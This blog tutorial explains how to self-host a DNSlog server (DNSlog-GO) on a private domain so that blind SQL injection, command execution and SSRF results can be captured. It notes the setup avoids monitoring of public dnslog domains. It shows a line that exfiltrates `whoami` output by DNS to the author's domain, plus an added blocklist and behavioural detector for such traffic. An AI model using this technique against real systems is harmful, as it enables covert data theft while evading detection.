Self-built DNSlog server

Introduction to DNSlog

In some cases, exploiting a vulnerability produces no visible output (no echo). However, if the target can send DNS requests, the desired data can be carried out in the DNS queries and read from the DNS log.

DNS logs are often used in the following situations:

  • Blind SQL injection
  • Command execution without echo
  • SSRF without echo

There are many dnslog services publicly available on the Internet, such as dnslog.cn, Zhichuangyu, Clover, etc., but the domain names provided by these services are fixed. Some relatively large enterprises have now added these domain names to their monitoring scope.

A dnslog service that you build yourself runs on your own domain name, so it avoids this situation.
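Seen from the monitoring side, this is why a fixed list of public dnslog domains is not enough. The following is an added example, not part of the original post: it runs a blocklist check and a behavioural check (one client resolving many distinct, deep names under a single zone) over resolver log lines. The log lines, the `<client_ip> <name>` format, the thresholds and the two-label zone rule are assumptions made for illustration.

```python
from collections import defaultdict

# Fixed list of public dnslog domains (the monitoring approach the post describes).
BLOCKLIST = {"dnslog.cn"}

# Constructed sample resolver log, one "<client_ip> <queried_name>" per line.
SAMPLE_LOG = """\
10.0.0.5 www.example.com
10.0.0.5 mail.example.com
10.0.0.9 a1b2c3.dnslog.cn
10.0.0.7 root.spmkj.dnslog.bigwulong.cn
10.0.0.7 www-data.spmkj.dnslog.bigwulong.cn
10.0.0.7 db01.spmkj.dnslog.bigwulong.cn
10.0.0.7 5.7.42.spmkj.dnslog.bigwulong.cn
"""

def zone_of(name):
    """Naive registered zone: the last two labels (assumption: no public suffix list)."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])

def parse(log):
    """Yield (client, normalised name) for every well-formed log line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 2:
            yield parts[0], parts[1].rstrip(".").lower()

def blocklist_hits(log):
    """Names whose zone is on the fixed list; misses any self-hosted domain."""
    return sorted({name for _, name in parse(log) if zone_of(name) in BLOCKLIST})

def behavioural_hits(log, min_unique=3, min_labels=4):
    """(client, zone) pairs where one client resolved at least min_unique
    distinct names of at least min_labels labels under the same zone."""
    seen = defaultdict(set)
    for client, name in parse(log):
        if name.count(".") + 1 >= min_labels:
            seen[(client, zone_of(name))].add(name)
    return sorted(key for key, names in seen.items() if len(names) >= min_unique)

if __name__ == "__main__":
    print("blocklist:  ", blocklist_hits(SAMPLE_LOG))
    print("behavioural:", behavioural_hits(SAMPLE_LOG))
```

On the sample log the blocklist only reports the dnslog.cn query, while the behavioural check reports the client that issued the queries under bigwulong.cn.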

What you need to prepare

  1. An Alibaba Cloud domain name
  2. One VPS server

DNS

Add an A record and an NS record in bigwulong.cn. The A record points to the server IP address, and the NS record points to the domain name of the A record.

Figure: Alibaba Cloud (Wanwang) DNS resolution settings

Figure: Resolution process

How to obtain it

DNSlog-GO is a dnslog server written in Go. It has its own web interface, which can be customized, edited, modified and restyled. It is compatible with Linux, macOS, Windows and other systems. On each platform it can be downloaded and run directly, with no dependencies to install. Here, Linux is used as an example.

Github address: https://github.com/lanyi1998/DNSlog-GO/releases/

Download address of this site (Linux DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-linux.zip

Download address of this site (MacOS DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-macos.zip

Download address of this site (Windows DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-windows.zip

Run

Modify the default token

[root@localhost ~]# vim config.yaml 

HTTP:
  port: 8000
  # {"token": "subdomain assigned to the user"}
  user: { "123456": "logdns" }
  consoleDisable: false
Dns:
  domain: bigwulong.cn

Start up

[root@localhost ~]# ./dnslog-linux &
2023/07/14 07:09:39 Http Listing Start...
2023/07/14 07:09:39 Http address: http://0.0.0.0:8000
2023/07/14 07:09:39 DNS Listing Start...

Check the process and the listening ports

[root@kr-seoul ~]# ps aux | grep dnslog
root      3275  0.0  0.6 714196  6160 pts/0    Sl   07:09   0:00 ./dnslog-linux
root      3296  0.0  0.0 112808   976 pts/0    R+   07:11   0:00 grep --color=auto dnslog

[root@kr-seoul ~]# netstat -tnlpu | grep -E '8000|53'
tcp6       0      0 :::8000                 :::*                    LISTEN      3275/./dnslog-linux 
udp6       0      0 :::53                   :::*                                3275/./dnslog-linux 

Test

Web page access test: you need to enter the token, which is the value set in config.yaml.

Figure: Web page

Click to copy the random subdomain name, here spmkj.dnslog.bigwulong.cn

Use the ping command

[root@localhost ~]# ping `whoami`.spmkj.dnslog.bigwulong.cn -c 1
PING root.spmkj.dnslog.bigwulong.cn (127.0.0.1) 56(84) bytes of data.
64 bytes from kr-seoul.if010.com (127.0.0.1): icmp_seq=1 ttl=64 time=0.023 ms

--- root.spmkj.dnslog.bigwulong.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms

You can see the echoed result in the web interface.

Figure: The echoed result

Origin blog.csdn.net/qq_32262243/article/details/131726465